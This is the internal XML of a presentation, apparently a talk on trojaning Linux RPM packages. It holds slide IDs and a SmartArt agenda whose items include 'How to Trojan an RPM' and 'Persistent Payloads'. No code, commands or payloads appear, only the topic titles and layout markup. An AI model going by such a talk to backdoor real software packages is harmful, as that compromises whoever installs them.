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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="269" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="266"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19"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50A35-954C-4E18-BAA2-BFA1E6232BF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CFC7660-2960-4232-8797-7FCBECC0AC4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Overview of RPM installation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCA29BB5-3C6B-4A1D-9D2F-2662DF234D39}" type="parTrans" cxnId="{1E2AFF65-AEC7-4F60-BC53-716443C13F4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B050474-46C1-4681-A79D-11AD43997DFB}" type="sibTrans" cxnId="{1E2AFF65-AEC7-4F60-BC53-716443C13F4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8609647C-5374-4C81-AE06-A7015E38A9C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Components of RPM package</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{022EC362-EDFE-4BD7-838C-268BA7CF7B2C}" type="parTrans" cxnId="{3708D7B9-FDA6-420E-B30C-5A1CD3A5661F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7B5DE44-9B83-49F7-8D19-1750405D98C1}" type="sibTrans" cxnId="{3708D7B9-FDA6-420E-B30C-5A1CD3A5661F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>How to Trojan an RPM</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{353F24EA-8BFD-48F0-A2D3-EDDB2301F292}" type="parTrans" cxnId="{9A43840B-7D97-401C-8B6F-507C0EA4836B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{948BB8DD-472D-45B1-A858-E294B840B9C9}" type="sibTrans" cxnId="{9A43840B-7D97-401C-8B6F-507C0EA4836B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE71BD19-3984-4CB4-96E1-FC23695B944C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Persistent Payloads</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{169ECB93-4CA2-4D3F-9851-87FB82D12B95}" type="parTrans" cxnId="{F77FBE72-6D60-4975-9138-F03833710E5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F7CBC0E-C08A-43A6-9435-99E7BA0DB445}" type="sibTrans" cxnId="{F77FBE72-6D60-4975-9138-F03833710E5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{947EC460-D2CD-4A2E-8AB1-D932E5343457}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Putting it all together</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F69D818B-9B8E-450B-AC83-CE4961E2F53E}" type="parTrans" cxnId="{766E7F18-A4F6-4F1C-BB49-A653A0188045}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCCF233B-6704-4646-95D9-67F01D032079}" type="sibTrans" cxnId="{766E7F18-A4F6-4F1C-BB49-A653A0188045}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" type="pres">
      <dgm:prSet presAssocID="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93936B01-73F3-4D53-9E25-1AC2095C1F29}" type="pres">
      <dgm:prSet presAssocID="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{131ECF73-C91E-4BE7-A182-AE0D695FD568}" type="pres">
      <dgm:prSet presAssocID="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0B4AB940-4A84-4754-8E82-041B4A932EA5}" type="pres">
      <dgm:prSet presAssocID="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0AEEDBFA-51A8-4595-B328-4908F0003259}" type="pres">
      <dgm:prSet presAssocID="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0F6BC86-DB5C-4A72-8F5B-C0E1F60797F9}" type="pres">
      <dgm:prSet presAssocID="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{33FE3FCC-DFB6-45CB-B6A7-E069A02456F2}" type="pres">
      <dgm:prSet presAssocID="{4B050474-46C1-4681-A79D-11AD43997DFB}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9C5F9BFA-6AEE-4658-8C17-C917A7F61218}" type="pres">
      <dgm:prSet presAssocID="{8609647C-5374-4C81-AE06-A7015E38A9C9}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B0634658-7DCE-4C2B-82FC-437B4F8BBECE}" type="pres">
      <dgm:prSet presAssocID="{8609647C-5374-4C81-AE06-A7015E38A9C9}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3102F50E-4A12-4D0F-B75A-92C00D7CB633}" type="pres">
      <dgm:prSet presAssocID="{8609647C-5374-4C81-AE06-A7015E38A9C9}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC9E0D9C-2250-4DB4-A838-48FF027B34FA}" type="pres">
      <dgm:prSet presAssocID="{8609647C-5374-4C81-AE06-A7015E38A9C9}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9856F480-59A0-4C90-B7C9-E6EBF420C3A6}" type="pres">
      <dgm:prSet presAssocID="{8609647C-5374-4C81-AE06-A7015E38A9C9}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF919FBE-CF20-4F9E-9322-7DD402790FA6}" type="pres">
      <dgm:prSet presAssocID="{F7B5DE44-9B83-49F7-8D19-1750405D98C1}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2DA577C7-A3E7-4290-A226-ECA007B2E978}" type="pres">
      <dgm:prSet presAssocID="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EC6864A-0CCB-45BE-A80F-FE82CD5FC541}" type="pres">
      <dgm:prSet presAssocID="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1041981C-9058-4E5E-918F-91B2EDA979C2}" type="pres">
      <dgm:prSet presAssocID="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE5904D3-D192-4184-962D-F2ADD88AA792}" type="pres">
      <dgm:prSet presAssocID="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3064F9D5-0F57-470F-AF26-5C29C8F66447}" type="pres">
      <dgm:prSet presAssocID="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{46FFE099-5ECE-45C0-8EFF-65FB867D6724}" type="pres">
      <dgm:prSet presAssocID="{948BB8DD-472D-45B1-A858-E294B840B9C9}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FDE44E3A-3C7D-47A6-B9AD-DA1493CA177B}" type="pres">
      <dgm:prSet presAssocID="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{53756BC9-CD1C-4415-AC49-8598E2B9F31D}" type="pres">
      <dgm:prSet presAssocID="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{91711570-4645-4DDF-9D1B-D1E7F7CEFD52}" type="pres">
      <dgm:prSet presAssocID="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8EDF68C7-569D-4B3C-A0C4-576A381C0B6B}" type="pres">
      <dgm:prSet presAssocID="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7CED1E0A-76CA-4294-8D25-9348075726F3}" type="pres">
      <dgm:prSet presAssocID="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{46AE9617-27F9-434F-86DF-BDB2AC5E0B97}" type="pres">
      <dgm:prSet presAssocID="{3F7CBC0E-C08A-43A6-9435-99E7BA0DB445}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{001A4110-FDD4-4E9E-B713-D13528031ADF}" type="pres">
      <dgm:prSet presAssocID="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4A013C4-F35E-4470-8AAC-C26D1E400E5C}" type="pres">
      <dgm:prSet presAssocID="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{13170697-3FB5-4433-8A9C-311E58943FA9}" type="pres">
      <dgm:prSet presAssocID="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B6E7F2D-C76E-4EFE-BE65-49FF9E84F2A7}" type="pres">
      <dgm:prSet presAssocID="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44AA433A-56FF-4851-8F4D-4E2B56041CE1}" type="pres">
      <dgm:prSet presAssocID="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{9A43840B-7D97-401C-8B6F-507C0EA4836B}" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" srcOrd="2" destOrd="0" parTransId="{353F24EA-8BFD-48F0-A2D3-EDDB2301F292}" sibTransId="{948BB8DD-472D-45B1-A858-E294B840B9C9}"/>
    <dgm:cxn modelId="{766E7F18-A4F6-4F1C-BB49-A653A0188045}" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" srcOrd="4" destOrd="0" parTransId="{F69D818B-9B8E-450B-AC83-CE4961E2F53E}" sibTransId="{DCCF233B-6704-4646-95D9-67F01D032079}"/>
    <dgm:cxn modelId="{E9626B21-F115-49BD-B62D-820C9C5F5830}" type="presOf" srcId="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" destId="{13170697-3FB5-4433-8A9C-311E58943FA9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{AF819E23-85F7-4831-97DA-8A2BAE512CA5}" type="presOf" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{84CC6D27-B3B6-484C-9727-CE3555275CD1}" type="presOf" srcId="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" destId="{9EC6864A-0CCB-45BE-A80F-FE82CD5FC541}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C1681B34-8592-45F8-B697-703C553B6985}" type="presOf" srcId="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" destId="{131ECF73-C91E-4BE7-A182-AE0D695FD568}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{70C1FC3D-836B-40D3-B38A-B8DD19ED0449}" type="presOf" srcId="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" destId="{B4A013C4-F35E-4470-8AAC-C26D1E400E5C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B05AC55C-3B51-4F8D-9CB8-9CD94540F405}" type="presOf" srcId="{8609647C-5374-4C81-AE06-A7015E38A9C9}" destId="{3102F50E-4A12-4D0F-B75A-92C00D7CB633}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E4289045-CC7B-4E33-9042-0DD69100C5F9}" type="presOf" srcId="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" destId="{91711570-4645-4DDF-9D1B-D1E7F7CEFD52}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1E2AFF65-AEC7-4F60-BC53-716443C13F4F}" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" srcOrd="0" destOrd="0" parTransId="{DCA29BB5-3C6B-4A1D-9D2F-2662DF234D39}" sibTransId="{4B050474-46C1-4681-A79D-11AD43997DFB}"/>
    <dgm:cxn modelId="{F77FBE72-6D60-4975-9138-F03833710E5A}" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" srcOrd="3" destOrd="0" parTransId="{169ECB93-4CA2-4D3F-9851-87FB82D12B95}" sibTransId="{3F7CBC0E-C08A-43A6-9435-99E7BA0DB445}"/>
    <dgm:cxn modelId="{C4D14885-25E6-403A-A01E-C23AA508F94B}" type="presOf" srcId="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" destId="{53756BC9-CD1C-4415-AC49-8598E2B9F31D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{905D5EAB-E845-4FC6-9E99-7BE1C87E7C45}" type="presOf" srcId="{8609647C-5374-4C81-AE06-A7015E38A9C9}" destId="{B0634658-7DCE-4C2B-82FC-437B4F8BBECE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3708D7B9-FDA6-420E-B30C-5A1CD3A5661F}" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{8609647C-5374-4C81-AE06-A7015E38A9C9}" srcOrd="1" destOrd="0" parTransId="{022EC362-EDFE-4BD7-838C-268BA7CF7B2C}" sibTransId="{F7B5DE44-9B83-49F7-8D19-1750405D98C1}"/>
    <dgm:cxn modelId="{F25CACD1-511A-4C0A-A1BE-2416607470D7}" type="presOf" srcId="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" destId="{0B4AB940-4A84-4754-8E82-041B4A932EA5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E7F029D2-8B0F-4F15-8DC0-42D9B991AC33}" type="presOf" srcId="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" destId="{1041981C-9058-4E5E-918F-91B2EDA979C2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8EBBD57F-6271-4267-BA24-EA7093AF394A}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{93936B01-73F3-4D53-9E25-1AC2095C1F29}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A9B62BBC-74A6-4F0C-820E-78DDDB205EE0}" type="presParOf" srcId="{93936B01-73F3-4D53-9E25-1AC2095C1F29}" destId="{131ECF73-C91E-4BE7-A182-AE0D695FD568}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D78972D1-024D-4EE6-BF74-AD1D91A0D2EE}" type="presParOf" srcId="{93936B01-73F3-4D53-9E25-1AC2095C1F29}" destId="{0B4AB940-4A84-4754-8E82-041B4A932EA5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A8473353-B4F0-491D-95BB-E8013F360B4D}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{0AEEDBFA-51A8-4595-B328-4908F0003259}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EDB9DD49-4461-4449-949D-401719F239F5}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{F0F6BC86-DB5C-4A72-8F5B-C0E1F60797F9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CA04E272-6570-4E18-B8DB-E31F79D4EF1D}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{33FE3FCC-DFB6-45CB-B6A7-E069A02456F2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3E87F9A2-F85A-45AD-850C-DE8053179164}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{9C5F9BFA-6AEE-4658-8C17-C917A7F61218}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{58CB4D99-8403-4DD2-8BBB-FF4DABA04488}" type="presParOf" srcId="{9C5F9BFA-6AEE-4658-8C17-C917A7F61218}" destId="{B0634658-7DCE-4C2B-82FC-437B4F8BBECE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{59EA5956-BBBA-42B4-AD40-1424600CFB03}" type="presParOf" srcId="{9C5F9BFA-6AEE-4658-8C17-C917A7F61218}" destId="{3102F50E-4A12-4D0F-B75A-92C00D7CB633}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{57F04D88-6B08-46E2-B630-C53A8F425F08}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{EC9E0D9C-2250-4DB4-A838-48FF027B34FA}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2A02EA17-29E3-4BAE-8397-02374A85284D}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{9856F480-59A0-4C90-B7C9-E6EBF420C3A6}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{48AF54C2-A880-41BE-A1DA-C3DE2DB1C13A}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{DF919FBE-CF20-4F9E-9322-7DD402790FA6}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1367E0ED-D9D2-436A-965E-29ECA34A497F}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{2DA577C7-A3E7-4290-A226-ECA007B2E978}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7133DAE9-1BF0-43A2-84F4-F53E029C56BB}" type="presParOf" srcId="{2DA577C7-A3E7-4290-A226-ECA007B2E978}" destId="{9EC6864A-0CCB-45BE-A80F-FE82CD5FC541}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F147B3A4-66B2-48AE-8D48-4423FA30A631}" type="presParOf" srcId="{2DA577C7-A3E7-4290-A226-ECA007B2E978}" destId="{1041981C-9058-4E5E-918F-91B2EDA979C2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{15A62489-C249-4BBC-AD3F-C2311CE4583D}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{BE5904D3-D192-4184-962D-F2ADD88AA792}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{28F4502F-B2FF-4FB9-A692-62D3A57330E6}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{3064F9D5-0F57-470F-AF26-5C29C8F66447}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DC996F54-E161-48F1-9FEA-5FC2B367C873}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{46FFE099-5ECE-45C0-8EFF-65FB867D6724}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{50500DF9-6358-46C7-9C02-2332FD06F06E}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{FDE44E3A-3C7D-47A6-B9AD-DA1493CA177B}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1334C136-5B2F-4977-9A99-33BA584016C1}" type="presParOf" srcId="{FDE44E3A-3C7D-47A6-B9AD-DA1493CA177B}" destId="{53756BC9-CD1C-4415-AC49-8598E2B9F31D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7AA4581A-B7CD-43D4-A00A-D8C4B27293D3}" type="presParOf" srcId="{FDE44E3A-3C7D-47A6-B9AD-DA1493CA177B}" destId="{91711570-4645-4DDF-9D1B-D1E7F7CEFD52}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5B845450-00D9-4000-A72E-92F27A62DE3B}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{8EDF68C7-569D-4B3C-A0C4-576A381C0B6B}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
